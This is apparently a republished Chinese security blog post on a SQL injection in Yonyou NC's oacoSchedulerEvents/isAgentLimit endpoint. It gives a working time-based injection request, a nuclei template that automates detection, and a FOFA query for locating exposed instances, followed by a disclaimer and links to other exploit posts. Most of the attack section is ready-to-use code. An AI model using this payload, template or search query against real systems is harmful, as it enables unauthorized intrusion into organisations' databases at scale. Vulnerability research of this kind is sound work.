2024年7月2日23:44:48评论46 views字数 987阅读3分17秒阅读模式

漏洞影响范围

【新】用友NC-oacoSchedulerEvents-SQL注入漏洞复现

漏洞复现

poc

延时注入5秒GET /portal/pt/oacoSchedulerEvents/isAgentLimit?pageId=login&pk_flowagent=1%27waitfor+delay+%270:0:5%27-- HTTP/1.1Host: Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7Connection: close

出现如下数据表示漏洞存在

【新】用友NC-oacoSchedulerEvents-SQL注入漏洞复现

nuclei脚本

id: yongyou-nc-oacoSchedulerEvents-sqli

info:  name: 用友NC oacoSchedulerEvents-SQL注入  author: 小白菜  severity: high  description: |      metadata:    fofa-query:   reference:    - https://  tags: auto

http:  - method: GET    path:      - "{{BaseURL}}/portal/pt/oacoSchedulerEvents/isAgentLimit?pageId=login&pk_flowagent=1'waitfor+delay+'0:0:5'--"

    matchers-condition: and    matchers:      - type: dsl        dsl:          - 'duration>=5'

搜索语法

fofa:app="用友-UFIDA-NC"

原文始发于微信公众号（小白菜安全）：【新】用友NC-oacoSchedulerEvents-SQL注入漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

用友NC-oacoSchedulerEvents-SQL注入漏洞复现

漏洞复现

搜索语法

安科瑞环保用电监管云平台任意文件上传漏洞

UNA CMS PHP对象注入漏洞

开发者注意！Vite框架曝高危漏洞，你的项目受影响了吗？（含poc和批量脚本）

【云安全】云原生- K8S IngressNightmare CVE-2025-1974（漏洞复现完整教程）

Erlang/OTP CVE-2025-32433 (CVSS 10)：严重 SSH 漏洞导致未经身份验证的 RCE

速达软件多款产品 doSavePrintTpl.action SQL注入漏洞

Erlang/OTP 严重 SSH 漏洞允许未认证的远程代码执行（CVE-2025-32433）

300 毫秒获取管理员权限：掌握 DLL 劫持和 Hook 技术（CVE-2025-24076/CVE-2025-24994）

【漏洞速递】PyTorch模型加载远程代码执行漏洞(CVE-2025-32434)

速达软件多款产品 doSavePrintTpl.action Struts2 远程代码执行漏洞

发表评论

在线咨询

微信